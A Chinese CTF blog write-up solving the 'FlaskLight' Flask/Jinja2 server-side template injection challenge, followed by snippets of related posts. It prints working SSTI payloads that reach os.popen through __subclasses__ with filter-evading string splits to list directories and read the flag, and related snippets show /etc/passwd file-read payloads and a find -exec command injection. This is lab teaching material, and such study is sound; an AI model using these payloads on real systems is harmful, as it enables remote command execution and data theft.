一天一道ctf 第51天

最新推荐文章于 2023-05-24 21:04:15 发布
最新推荐文章于 2023-05-24 21:04:15 发布
阅读量165 收藏
点赞数
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scrawman/article/details/119564658

[CSCCTF 2019 Qual]FlaskLight
在这里插入图片描述
查看源码有提示,模板注入做的很多了。?search={{7*7}}看一下注入的类型,确定是SSTI注入。在这里插入图片描述
因为之前做过类似的题,用的是catch_warnings类,这次想用一样的payload但是好像不行

?search= {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.['__glo'+'bals__']['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}

?search=[].__class__.__base__.__subclasses__()看一下是有catch_warnings这个类的,最后试下来是listdir被过滤了,换成popen('ls').read()就好了。
在这里插入图片描述

http://ce91ad90-010d-478f-91b2-e2294cdb4ac2.node4.buuoj.cn:81/?search= {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__['__glo'+'bals__']['__builtins__']['__imp'+'ort__']('o'+'s').popen('ls').read()}}{% endif %}{% endfor %}

在这里插入图片描述
拿到目录,再进入flasklight文件夹下

 {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__['__glo'+'bals__']['__builtins__']['__imp'+'ort__']('o'+'s').popen('ls /flasklight').read()}}{% endif %}{% endfor %}

在这里插入图片描述
最后cat /flasklight/coomme_geeeett_youur_flek拿到flag
在这里插入图片描述
还可以用site._Printer类和subprocess.Popen类来做
https://www.cnblogs.com/ersuani/p/13896200.html
添加链接描述

scrawman
关注
实验四 /*CTF实践*/
Tauil的博客
01-07 446
目的:获取靶机Web Developer 文件/root/flag.txt中flag。 基本思路:本网段IP地址存活扫描(netdiscover);网络扫描(Nmap);浏览HTTP 服务;网站目录枚举(Dirb);发现数据包文件 “cap”;分析 “cap” 文件,找到网站管理后台账号密码;插件利用(有漏洞);利用漏洞获得服务器账号密码;SSH 远程登录服务器;tcpdump另类应用。 实施细节如下: 1、发现目标 (netdiscover),找到WebDeveloper的IP地址。截图。 nmap.
一天一道ctf 第56(ascii偏移盲注)
scrawman的博客
08-18 614
[GYCTF2020]Ezsqli 先用二分法写一个脚本查一下表名,二分法快是快,但就是容易出错,用sleep延缓一下请求速度会好一些。or被过滤了所以informaiton.schema用不了,换成sys.x$schema_flattened_keys。 import requests import time url = "http://7630a861-14ab-4171-bfd2-dff39c2434b9.node4.buuoj.cn:81/" flag = "" payload = "1^(a
CTF中Web各种题目的解题姿势
05-25
Web题型是CTF中常考题型之一,它将实际渗透过程中的技术技巧转化为CTF赛题,主要考察选手在Web渗透技术方面的能力,由于Web渗透涉及的知识点较多,知识面比较广泛,因此系统的总结和练习Web类题,是快速掌握出题人思路的一种有效的方法。
服务器模板注入 (SSTI)
since_2020的博客
09-08 350
服务器模板注入 (SSTI) 基本注入流程 ''.__class__ 显示这个东西的类 ''.__class__.base__ 找到这个的基类 ''.__class__.__base__.__subclasses__() 看基类的子类 敏感子类 popen、sys、os 因为''.__class__.__base__.__subclasses__()返回的是一个列表, 所以直接''.__class__.__base__.__subclasses__()[425]查看的就是popen这个 注意
2021-AFCTF
unexpectedthing的博客
04-17 3188
AFCTF search 考点 就是一个对find的命令了解,参数exec可以实现命令 wp payload /search.php?search=flag -exec cat {} \; google authenticator 考点 sql注入,拿到secret的密钥 google身份验证码的实现 蚁剑连接,无权限,进行信息收集 蚁剑反弹shell到vps 非交互式shell变为交互式shell的两种方式 写定时任务redis提权 wp 看到登录界面,扫一波,没有东西 尝试进行sql注入 先来个万
python ssti正确利用方式
qq_49973474的博客
05-11 1090
很好 很有精神
一天一道ctf 第16(data伪协议,异或sql注入)
scrawman的博客
03-29 2232
看到unserialize()函数觉得是反序列化的题,但是没有看到class的定义。作者这边提示了useless.php,那就用filter伪协议一下看看。?file=php://filter/read=convert.base64-encode/resource=useless.php,没有反应,忘记了前面text也要绕过。 text的值可以用data伪协议输入,?text=data:text/plain,welcome to the zjctf&file=php://filter/read=.
写一下自已对ctf的了解,以便日后自已需要
m0_50987622的博客
11-07 6258
11.7 本人ctf小白,参加比赛基本处于摸鱼状态,也没有系统了解过ctf以及做过相关的实践和练习,但是,对这一块比较感兴趣,所以,只能说,在学习中,就跟我当初学makefile一样,做下记录,写点自已觉得对自已有用的东西,大概这样。 ctf总共分为五部分,misc杂项,crypto解密加密,pwn攻破设备、系统,reverse逆向渗透,web网络安全。500pt的题都很难。 首先,建立在你对前后端足够了解的基础上。 web安全就是黑服务器,pwn就是黑设备黑系统,至于怎么黑,仁者见仁智者见智,取决
初识CTF Day2 CTFHUB密码口令&SQL注入
suxinAL的博客
09-27 1003
前言 接着上次的继续往下做 git泄露结束了,现在开始看svn和hg 正文 首先看一下信息泄露部分的svn和hg 这里使用到一个工具dvcs-ripper 下载地址如下 https://github.com/kost/dvcs-ripper.git (注意:该工具一定要配置环境,具体如下图,或者查看readme.md) 安装好工具就简单了,我是在kali虚拟机里进行使用的 具体指令如下 cd dvcs-ripper-master ./rip-svn.pl -v -u http://challenge-d
一道简单的逆向题的解法 baby_crack
Peanuts
05-12 3280
刚开始接触逆向的题目师傅就给啦一道题目链接:https://pan.baidu.com/s/13cR9WUr1rydFjjbM2meyug  密码:jg3j    题目和wp都在里面下面开始记录首先ida大法好~一个美丽姑娘的头像接着f5大法好~题目本身比较简单,就先看一下第一个sub_4006DF函数这里的逻辑也是很清楚并没有什么拐弯的就是当i分别满足其中的条件后对v8这个数组进行赋值,之前第一...
SSTI基础学习
qq_63267612的博客
07-10 3902
一、什么是SSTI SSTI就是服务器端模板注入(Server-Side Template Injection),也给出了一个注入的概念。常见的注入有:SQL 注入,XSS 注入,XPATH 注入,XML 注入,代码注入,命令注入等等。SSTI也是注入类的漏洞,其成因其实是可以类比于sql注入的。sql注入是从用户获得一个输入,然后又后端脚本语言进行数据库查询,所以可以利用输入来拼接我们想要的sql语句,当然现在的sql注入防范做得已经很好了,然而随之而来的是更多的漏洞。SSTI也是获取了一个输入,然后再后
(补题)2015 9447 CTF : Search Engine
hollk’s blog
12-31 2383
本文对2015 9447 CTF : Search Engine这道题目做了非常详细讲解,因为出差加上只有下班的时间,这篇文章写了小半个月。在静态分析阶段遇到层层的阻碍,ida的伪C代码翻译不够准确,导致程序的执行流程捋的不清晰,好在gdb跟踪下来明白了。这道题有两种利用方式,这篇文章写的是利用Double Free这种技巧
CTF 2015: Search Engine-fastbin_dup_into_stack
个人笔记
05-24 866
参考: [1]https://gsgx.me/posts/9447-ctf-2015-search-engine-writeup/ [2]https://blog.csdn.net/weixin_38419913/article/details/103238963(掌握利用点,省略各种逆向细节) [3]https://bbs.kanxue.com/thread-267876.htm(逆向调试详解) [4]https://bbs.kanxue.com/thread-247219.htm(双解法) 1,三连 2
2015 9447 CTF Search Engine
WocW的博客
06-12 977
2015 9447 CTF : Search Engine] 前言 题目下载 于我来说难度不小,但是克服下来收获还是很多的。原文链接,在做这题的过程中确实用到了之前没看懂的部分,很多细节需要自己去实现一下才能搞明白,比如字节错位这样的… 整体利用了double free,泄露unsoredbin地址,任意地址分配。 分析 漏洞点: 在search里仅仅free了,没有设为null,可以再次free...
2015 9447 CTF : Search Engine
coco的博客
11-25 565
程序分析 index a sentence 首先入size大小的sentence,数据入到malloac出的一个chunk中。 对sentence中的每个word建立对应的结构体,也是分配到堆中,结构体中的组成为: struct word { word ptr //指向每个word的起始地址 word size //每个word的大小 sentence ptr //指向句子的起始地址...
SSTI/沙盒逃逸详细总结
devil8123665的博客
03-09 1622
一 flask 1 、基本用法 >>> [].__class__.__base__ <class 'object'> >>> [].__class__.__mro__ (<class 'list'>, <class 'object'>) >>> [].__class__.__bases__ (<class 'object'>,) 2、取子类 [].__class__.__base__.__sub
SSTI (服务器模板注入)
热门推荐
Hydra的博客
11-02 2万+
 先来一波flask ssti漏洞的代码。 #python3 #Flask version:0.12.2 #Jinja2: 2.10 from flask import Flask, request from jinja2 import Template app = Flask(__name__) @app.route("/") def index(): name = request....
SSTI(模板注入)漏洞利用
Ciyaso的博客
07-15 721
文件 文件: 方法一 ''.__class__.__mro__[2].__subclasses__()[166].__init__.__globals__['__builtins__']['file']('/etc/passwd').read() 方法二: [].__class__.__base__.__subclasses__()[40]('/etc/passwd').read() 写文件换为 .write() 即可。 写文件: 方法一: ''.__class__.__mro__[2].__su
i春秋 afr3 任意文件SSTI flask模板注入 session伪造 详细题解
AAAAAAAAAAAA66的博客
11-23 4010
---------------------------------------------------------------------------------------------------------------------------------这道题考察的范围挺广的,对于我这样的新手很不友好,那些知识也不是一时半会就能够学完的, 我也是搞了好几,才理解思路和相关细节。 但其实对于这道题来说,只需要从那几个知识面中,了解几个'支点'就能做出。 又回到那句话,做题扩充各种知识点,比从0到1
这是一道ctf题目
最新发布
06-19
<think>我们有一个CTF题目中的字符串:f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAA8ARAAAAAAABAAAAAAAAAAJA/AAAAAAAAAAAAAEAAOAAJAEAAHgAdAAYAAAAEAAAAQ...(省略部分)根据之前的引用,特别是引用[3]中提到的解密过程,我们可以推测这可能是一个二进制文件(因为开头是"f0VMRgIBA",这看起来像ELF文件的魔数)。但是,用户给出的字符串是Base64编码的吗?还是直接是二进制数据?观察字符串:它以"f0VMRgIBA"开头,这类似于ELF文件头的Base64编码。因为ELF文件头通常以"\x7fELF"开始,我们将其转换为Base64:"\x7f"的ASCII码是127,在Base64编码表中,127对应的字符并不是直接可的,但我们可以尝试将整个字符串进行Base64解码。步骤:1.将给定的字符串(Base64编码)解码为二进制数据。2.将二进制数据保存为文件,然后分析文件类型。但是,用户给出的字符串很长,而且中间有省略号。我们无法处理省略的部分,所以只能假设这是一个完整的Base64字符串。然而,引用[3]中提到的解密过程是一个自定义的算法,但用户提供的字符串看起来像Base64编码的二进制文件,所以可能不需要引用[3]的算法。另外,引用[1]中提到了八进制数字字符串转换为ASCII字符的方法,但这里不是八进制数字字符串,而是Base64字符串。所以,我们尝试Base64解码。由于字符串很长,我们可以写一个简单的程序来解码并保存为文件,然后使用工具分析(如file命令、strings命令等)。但在这里,我们只能进行Base64解码,然后查看文件头确认。注意:在Python中,我们可以用base64模块进行解码。示例代码:importbase64encoded_str="f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAA8ARAAAAAAABAAAAAAAAAAJA/AAAAAAAAAAAAAEAAOAAJAEAAHgAdAAYAAAAEAAAAQ..."#这里需要完整的字符串decoded_data=base64.b64decode(encoded_str)withopen('output','wb')asf:f.write(decoded_data)然后,我们可以用命令行工具检查文件类型:fileoutput如果文件是ELF可执行文件,那么我们可以尝试运行它(在安全环境下)或者用逆向工程工具(如IDA、Ghidra)分析。但是,用户没有提供完整的字符串,所以我们无法实际执行。因此,我们只能提供方法。另外,如果题目有额外的加密或混淆,可能需要进一步分析。但根据字符串开头,很大可能是ELF文件。因此,回答如下:</think>要解码或分析CTF题目中的字符串 `f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAA8ARAAAAAAABAAAAAAAAAAJA/AAAAAAAAAAAAAEAAOAAJAEAAHgAdAAYAAAAEAAAAQ...`,请按以下步骤操作: ### 🔍 解码步骤分析 1. **识别文件类型** - 字符串开头 `f0VMRgIBA` 是 **ELF可执行文件头的Base64编码**(对应魔数 `\x7fELF`)。 - 使用Base64解码还原原始二进制文件: ```python import base64 encoded_str = "f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAA8ARAAAAAAABAAAAAAAAAAJA/AAAAAAAAAAAAAEAAOAAJAEAAHgAdAAYAAAAEAAAAQ..." # 替换为完整字符串 decoded_data = base64.b64decode(encoded_str) with open("output.elf", "wb") as f: f.write(decoded_data) ``` 2. **分析ELF文件** - 通过工具检查文件属性: ```bash file output.elf # 查看文件类型(如ELF 32/64位) strings output.elf # 提取文件中的可字符串 objdump -d output.elf # 反汇编查看汇编代码 ``` - 若文件包含加密逻辑(如引用[3]中的自定义解密流程),需用逆向工具(Ghidra/IDA)分析关键函数。 3. **处理加密逻辑** - 若发现类似引用[3]的异或加密(`flag += chr(ord(b[i]) ^ ord(tag[i % 6]))`),需定位密钥(如`tag = 'redctf'`)和密文数据段。 - 示例解密片段: ```python tag = 'redctf' # 或根据上下文调整密钥 encrypted_data = [...] # 从文件中提取的密文字节 flag = ''.join(chr(encrypted_data[i] ^ ord(tag[i % len(tag)])) for i in range(len(encrypted_data))) ``` ### ⚠️ 注意事项 - **动态调试**:若文件可执行,使用 `gdb` 或 `strace` 跟踪运行时行为(如输入/输出、系统调用)。 - **隐写可能性**:检查文件是否隐藏额外数据(如通过 `binwalk` 分析)。 - **环境差异**:密钥或算法可能依赖运行环境(如引用[3]中密钥随环境变化)[^3]。 ### 📝 相关问题 1. Base64解码后文件不是ELF格式怎么办? 2. 如何快速定位ELF文件中的加密函数? 3. 遇到非标准加密算法(如自定义位操作)如何逆向分析? > 引用说明:ELF文件头特征分析参考标准文件格式文档[^1],异或解密方法借鉴了CTF逆向题的常见模式[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值